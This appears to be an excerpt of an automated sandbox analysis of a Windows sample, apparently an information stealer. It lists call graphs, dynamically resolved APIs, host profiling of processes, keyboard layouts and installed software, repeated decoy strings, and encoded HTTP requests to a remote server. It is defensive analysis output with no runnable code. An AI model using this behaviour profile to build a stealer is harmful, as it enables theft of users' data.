lstrcpy 15640->15641 15642 98b82 GetSystemTime 15641->15642 15643 98b99 15642->15643 15644 9a7a0 lstrcpy 15643->15644 15645 98bfc 15644->15645 15645->14599 15647 9a931 15646->15647 15648 9a988 15647->15648 15650 9a968 lstrcpy lstrcat 15647->15650 15649 9a7a0 lstrcpy 15648->15649 15651 9a994 15649->15651 15650->15648 15651->14602 15652->14717 15654 89af9 LocalAlloc 15653->15654 15655 84eee 15653->15655 15654->15655 15656 89b14 CryptStringToBinaryA 15654->15656 15655->14605 15655->14608 15656->15655 15657 89b39 LocalFree 15656->15657 15657->15655 15658->15636 15659->14727 15660->14868 15661->14870 15662->14878 15791 977a0 15663->15791 15666 976c6 RegOpenKeyExA 15668 97704 RegCloseKey 15666->15668 15669 976e7 RegQueryValueExA 15666->15669 15667 91c1e 15667->14960 15668->15667 15669->15668 15671 91c99 15670->15671 15671->14974 15673 91e09 15672->15673 15673->15016 15675 97a9a wsprintfA 15674->15675 15676 91e84 15674->15676 15675->15676 15676->15030 15678 97b4d 15677->15678 15679 91efe 15677->15679 15798 98d20 LocalAlloc CharToOemW 15678->15798 15679->15044 15682 9a740 lstrcpy 15681->15682 15683 97bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15682->15683 15692 97c25 15683->15692 15684 97d18 15686 97d28 15684->15686 15687 97d1e LocalFree 15684->15687 15685 97c46 GetLocaleInfoA 15685->15692 15688 9a7a0 lstrcpy 15686->15688 15687->15686 15691 97d37 15688->15691 15689 9a8a0 lstrcpy 15689->15692 15690 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15690->15692 15691->15057 15692->15684 15692->15685 15692->15689 15692->15690 15694 92008 15693->15694 15694->15072 15696 99493 GetModuleFileNameExA CloseHandle 15695->15696 15697 994b5 15695->15697 15696->15697 15698 9a740 lstrcpy 15697->15698 15699 92091 15698->15699 15699->15087 15701 97e68 RegQueryValueExA 15700->15701 15702 92119 15700->15702 15703 97e8e RegCloseKey 15701->15703 15702->15101 15703->15702 15705 97fb9 GetLogicalProcessorInformationEx 15704->15705 15706 97fd8 GetLastError 15705->15706 15708 98029 15705->15708 15707 98022 15706->15707 15716 97fe3 15706->15716 15711 92194 15707->15711 15713 989f0 2 API calls 15707->15713 15712 989f0 2 API calls 15708->15712 15711->15115 15714 9807b 15712->15714 15713->15711 15714->15707 15715 98084 wsprintfA 15714->15715 15715->15711 15716->15705 15716->15711 15799 989f0 15716->15799 15802 98a10 GetProcessHeap RtlAllocateHeap 15716->15802 15718 9220f 15717->15718 15718->15129 15720 989b0 15719->15720 15721 9814d GlobalMemoryStatusEx 15720->15721 15722 98163 __aulldiv 15721->15722 15723 9819b wsprintfA 15722->15723 15724 92289 15723->15724 15724->15143 15726 987fb GetProcessHeap RtlAllocateHeap wsprintfA 15725->15726 15728 9a740 lstrcpy 15726->15728 15729 9230b 15728->15729 15729->15157 15731 9a740 lstrcpy 15730->15731 15733 98229 15731->15733 15732 98263 15734 9a7a0 lstrcpy 15732->15734 15733->15732 15735 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15733->15735 15737 9a8a0 lstrcpy 15733->15737 15736 982dc 15734->15736 15735->15733 15736->15174 15737->15733 15739 9a740 lstrcpy 15738->15739 15740 9835c RegOpenKeyExA 15739->15740 15741 983ae 15740->15741 15742 983d0 15740->15742 15743 9a7a0 lstrcpy 15741->15743 15744 983f8 RegEnumKeyExA 15742->15744 15745 98613 RegCloseKey 15742->15745 15754 983bd 15743->15754 15746 9843f wsprintfA RegOpenKeyExA 15744->15746 15747 9860e 15744->15747 15748 9a7a0 lstrcpy 15745->15748 15749 984c1 RegQueryValueExA 15746->15749 15750 98485 RegCloseKey RegCloseKey 15746->15750 15747->15745 15748->15754 15752 984fa lstrlen 15749->15752 15753 98601 RegCloseKey 15749->15753 15751 9a7a0 lstrcpy 15750->15751 15751->15754 15752->15753 15755 98510 15752->15755 15753->15747 15754->15200 15756 9a9b0 4 API calls 15755->15756 15757 98527 15756->15757 15758 9a8a0 lstrcpy 15757->15758 15759 98533 15758->15759 15760 9a9b0 4 API calls 15759->15760 15761 98557 15760->15761 15762 9a8a0 lstrcpy 15761->15762 15763 98563 15762->15763 15764 9856e RegQueryValueExA 15763->15764 15764->15753 15765 985a3 15764->15765 15766 9a9b0 4 API calls 15765->15766 15767 985ba 15766->15767 15768 9a8a0 lstrcpy 15767->15768 15769 985c6 15768->15769 15770 9a9b0 4 API calls 15769->15770 15771 985ea 15770->15771 15772 9a8a0 lstrcpy 15771->15772 15773 985f6 15772->15773 15773->15753 15775 9a740 lstrcpy 15774->15775 15776 986bc CreateToolhelp32Snapshot Process32First 15775->15776 15777 986e8 Process32Next 15776->15777 15778 9875d CloseHandle 15776->15778 15777->15778 15783 986fd 15777->15783 15779 9a7a0 lstrcpy 15778->15779 15782 98776 15779->15782 15780 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15780->15783 15781 9a8a0 lstrcpy 15781->15783 15782->15232 15783->15777 15783->15780 15783->15781 15785 9a7a0 lstrcpy 15784->15785 15786 951b5 15785->15786 15787 81590 lstrcpy 15786->15787 15788 951c6 15787->15788 15803 85100 15788->15803 15790 951cf 15790->15244 15794 97720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15791->15794 15793 976b9 15793->15666 15793->15667 15795 97780 RegCloseKey 15794->15795 15796 97765 RegQueryValueExA 15794->15796 15797 97793 15795->15797 15796->15795 15797->15793 15798->15679 15800 989f9 GetProcessHeap HeapFree 15799->15800 15801 98a0c 15799->15801 15800->15801 15801->15716 15802->15716 15804 9a7a0 lstrcpy 15803->15804 15805 85119 15804->15805 15806 847b0 2 API calls 15805->15806 15807 85125 15806->15807 15963 98ea0 15807->15963 15809 85184 15810 85192 lstrlen 15809->15810 15811 851a5 15810->15811 15812 98ea0 4 API calls 15811->15812 15813 851b6 15812->15813 15814 9a740 lstrcpy 15813->15814 15815 851c9 15814->15815 15816 9a740 lstrcpy 15815->15816 15817 851d6 15816->15817 15818 9a740 lstrcpy 15817->15818 15819 851e3 15818->15819 15820 9a740 lstrcpy 15819->15820 15821 851f0 15820->15821 15822 9a740 lstrcpy 15821->15822 15823 851fd InternetOpenA StrCmpCA 15822->15823 15824 8522f 15823->15824 15825 858c4 InternetCloseHandle 15824->15825 15826 98b60 3 API calls 15824->15826 15830 858d9 codecvt 15825->15830 15827 8524e 15826->15827 15828 9a920 3 API calls 15827->15828 15829 85261 15828->15829 15831 9a8a0 lstrcpy 15829->15831 15836 9a7a0 lstrcpy 15830->15836 15832 8526a 15831->15832 15833 9a9b0 4 API calls 15832->15833 15834 852ab 15833->15834 15835 9a920 3 API calls 15834->15835 15837 852b2 15835->15837 15844 85913 15836->15844 15838 9a9b0 4 API calls 15837->15838 15839 852b9 15838->15839 15840 9a8a0 lstrcpy 15839->15840 15841 852c2 15840->15841 15842 9a9b0 4 API calls 15841->15842 15843 85303 15842->15843 15845 9a920 3 API calls 15843->15845 15844->15790 15846 8530a 15845->15846 15847 9a8a0 lstrcpy 15846->15847 15848 85313 15847->15848 15849 85329 InternetConnectA 15848->15849 15849->15825 15850 85359 HttpOpenRequestA 15849->15850 15852 858b7 InternetCloseHandle 15850->15852 15853 853b7 15850->15853 15852->15825 15854 9a9b0 4 API calls 15853->15854 15855 853cb 15854->15855 15856 9a8a0 lstrcpy 15855->15856 15857 853d4 15856->15857 15858 9a920 3 API calls 15857->15858 15859 853f2 15858->15859 15860 9a8a0 lstrcpy 15859->15860 15861 853fb 15860->15861 15862 9a9b0 4 API calls 15861->15862 15863 8541a 15862->15863 15864 9a8a0 lstrcpy 15863->15864 15865 85423 15864->15865 15866 9a9b0 4 API calls 15865->15866 15867 85444 15866->15867 15868 9a8a0 lstrcpy 15867->15868 15869 8544d 15868->15869 15870 9a9b0 4 API calls 15869->15870 15871 8546e 15870->15871 15964 98ead CryptBinaryToStringA 15963->15964 15966 98ea9 15963->15966 15965 98ece GetProcessHeap RtlAllocateHeap 15964->15965 15964->15966 15965->15966 15967 98ef4 codecvt 15965->15967 15966->15809 15968 98f05 CryptBinaryToStringA 15967->15968 15968->15966 15972->15247 16215 89880 15973->16215 15975 898e1 15975->15254 15977 9a740 lstrcpy 15976->15977 15978 8fb16 15977->15978 16150 9a740 lstrcpy 16149->16150 16151 90266 16150->16151 16152 98de0 2 API calls 16151->16152 16153 9027b 16152->16153 16154 9a920 3 API calls 16153->16154 16155 9028b 16154->16155 16156 9a8a0 lstrcpy 16155->16156 16157 90294 16156->16157 16158 9a9b0 4 API calls 16157->16158 16216 8988e 16215->16216 16219 86fb0 16216->16219 16218 898ad codecvt 16218->15975 16222 86d40 16219->16222 16223 86d63 16222->16223 16236 86d59 16222->16236 16238 86530 16223->16238 16227 86dbe 16227->16236 16248 869b0 16227->16248 16229 86e2a 16230 86ee6 VirtualFree 16229->16230 16232 86ef7 16229->16232 16229->16236 16230->16232 16231 86f41 16235 989f0 2 API calls 16231->16235 16231->16236 16232->16231 16233 86f38 16232->16233 16234 86f26 FreeLibrary 16232->16234 16237 989f0 2 API calls 16233->16237 16234->16232 16235->16236 16236->16218 16237->16231 16239 86542 16238->16239 16241 86549 16239->16241 16258 98a10 GetProcessHeap RtlAllocateHeap 16239->16258 16241->16236 16242 86660 16241->16242 16245 8668f VirtualAlloc 16242->16245 16244 86730 16246 8673c 16244->16246 16247 86743 VirtualAlloc 16244->16247 16245->16244 16245->16246 16246->16227 16247->16246 16249 869c9 16248->16249 16253 869d5 16248->16253 16250 86a09 LoadLibraryA 16249->16250 16249->16253 16251 86a32 16250->16251 16250->16253 16256 86ae0 16251->16256 16259 98a10 GetProcessHeap RtlAllocateHeap 16251->16259 16253->16229 16254 86ba8 GetProcAddress 16254->16253 16254->16256 16255 989f0 2 API calls 16255->16256 16256->16253 16256->16254 16257 86a8b 16257->16253 16257->16255 16258->16241 16259->16257

                                    Executed Functions

                                    Function 00099860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 99860-99874 call 99750 663 9987a-99a8e call 99780 GetProcAddress * 21 660->663 664 99a93-99af2 LoadLibraryA * 5 660->664 663->664 666 99b0d-99b14 664->666 667 99af4-99b08 GetProcAddress 664->667 668 99b46-99b4d 666->668 669 99b16-99b41 GetProcAddress * 2 666->669 667->666 671 99b68-99b6f 668->671 672 99b4f-99b63 GetProcAddress 668->672 669->668 673 99b89-99b90 671->673 674 99b71-99b84 GetProcAddress 671->674 672->671 675 99bc1-99bc2 673->675 676 99b92-99bbc GetProcAddress * 2 673->676 674->673 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00D31668), ref: 000998A1
                                    • GetProcAddress.KERNEL32(76210000,00D317B8), ref: 000998BA
                                    • GetProcAddress.KERNEL32(76210000,00D31608), ref: 000998D2
                                    • GetProcAddress.KERNEL32(76210000,00D315C0), ref: 000998EA
                                    • GetProcAddress.KERNEL32(76210000,00D315F0), ref: 00099903
                                    • GetProcAddress.KERNEL32(76210000,00D38AD8), ref: 0009991B
                                    • GetProcAddress.KERNEL32(76210000,00D25128), ref: 00099933
                                    • GetProcAddress.KERNEL32(76210000,00D24F88), ref: 0009994C
                                    • GetProcAddress.KERNEL32(76210000,00D31518), ref: 00099964
                                    • GetProcAddress.KERNEL32(76210000,00D31638), ref: 0009997C
                                    • GetProcAddress.KERNEL32(76210000,00D31530), ref: 00099995
                                    • GetProcAddress.KERNEL32(76210000,00D31650), ref: 000999AD
                                    • GetProcAddress.KERNEL32(76210000,00D25048), ref: 000999C5
                                    • GetProcAddress.KERNEL32(76210000,00D316C8), ref: 000999DE
                                    • GetProcAddress.KERNEL32(76210000,00D31548), ref: 000999F6
                                    • GetProcAddress.KERNEL32(76210000,00D252C8), ref: 00099A0E
                                    • GetProcAddress.KERNEL32(76210000,00D31590), ref: 00099A27
                                    • GetProcAddress.KERNEL32(76210000,00D316E0), ref: 00099A3F
                                    • GetProcAddress.KERNEL32(76210000,00D25028), ref: 00099A57
                                    • GetProcAddress.KERNEL32(76210000,00D31878), ref: 00099A70
                                    • GetProcAddress.KERNEL32(76210000,00D25068), ref: 00099A88
                                    • LoadLibraryA.KERNEL32(00D31800,?,00096A00), ref: 00099A9A
                                    • LoadLibraryA.KERNEL32(00D317E8,?,00096A00), ref: 00099AAB
                                    • LoadLibraryA.KERNEL32(00D31818,?,00096A00), ref: 00099ABD
                                    • LoadLibraryA.KERNEL32(00D31860,?,00096A00), ref: 00099ACF
                                    • LoadLibraryA.KERNEL32(00D31830,?,00096A00), ref: 00099AE0
                                    • GetProcAddress.KERNEL32(75B30000,00D31848), ref: 00099B02
                                    • GetProcAddress.KERNEL32(751E0000,00D31890), ref: 00099B23
                                    • GetProcAddress.KERNEL32(751E0000,00D318A8), ref: 00099B3B
                                    • GetProcAddress.KERNEL32(76910000,00D38FE0), ref: 00099B5D
                                    • GetProcAddress.KERNEL32(75670000,00D25288), ref: 00099B7E
                                    • GetProcAddress.KERNEL32(77310000,00D38BD8), ref: 00099B9F
                                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00099BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00099BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                    • Instruction ID: 4ae76afd93712e136087656b7b6dff623fc217f17b7484b65a9884ef56c8b408
                                    • Opcode Fuzzy Hash: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                    • Instruction Fuzzy Hash: 73A1AEB55012889FC344EFA8FD8CE6AB7F9F74C309704861AE60AC7264D7399846CB56
                                    Function 000845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 677 845c0-84695 RtlAllocateHeap 694 846a0-846a6 677->694 695 846ac-8474a 694->695 696 8474f-847a9 VirtualProtect 694->696 695->694
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0008479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008475A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 718b049d48c94c869f044323da6e99f76fd660d4452e05cd7a8de79012f95b28
                                    • Instruction ID: 63813017ed6a2a6fd9d3b553e599e8b5a583fcfa7f731138a1df67ca7b47584c
                                    • Opcode Fuzzy Hash: 718b049d48c94c869f044323da6e99f76fd660d4452e05cd7a8de79012f95b28
                                    • Instruction Fuzzy Hash: A941F9606CB60C7EEE34BFE49C45E9F76966FC770DF5092C8EA045A290EBB065004926
                                    Function 00084880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 84880-84942 call 9a7a0 call 847b0 call 9a740 * 5 InternetOpenA StrCmpCA 816 8494b-8494f 801->816 817 84944 801->817 818 84ecb-84ef3 InternetCloseHandle call 9aad0 call 89ac0 816->818 819 84955-84acd call 98b60 call 9a920 call 9a8a0 call 9a800 * 2 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a920 call 9a8a0 call 9a800 * 2 InternetConnectA 816->819 817->816 829 84f32-84fa2 call 98990 * 2 call 9a7a0 call 9a800 * 8 818->829 830 84ef5-84f2d call 9a820 call 9a9b0 call 9a8a0 call 9a800 818->830 819->818 905 84ad3-84ad7 819->905 830->829 906 84ad9-84ae3 905->906 907 84ae5 905->907 908 84aef-84b22 HttpOpenRequestA 906->908 907->908 909 84b28-84e28 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a740 call 9a920 * 2 call 9a8a0 call 9a800 * 2 call 9aad0 lstrlen call 9aad0 * 2 lstrlen call 9aad0 HttpSendRequestA 908->909 910 84ebe-84ec5 InternetCloseHandle 908->910 1021 84e32-84e5c InternetReadFile 909->1021 910->818 1022 84e5e-84e65 1021->1022 1023 84e67-84eb9 InternetCloseHandle call 9a800 1021->1023 1022->1023 1024 84e69-84ea7 call 9a9b0 call 9a8a0 call 9a800 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00084915
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 0008493A
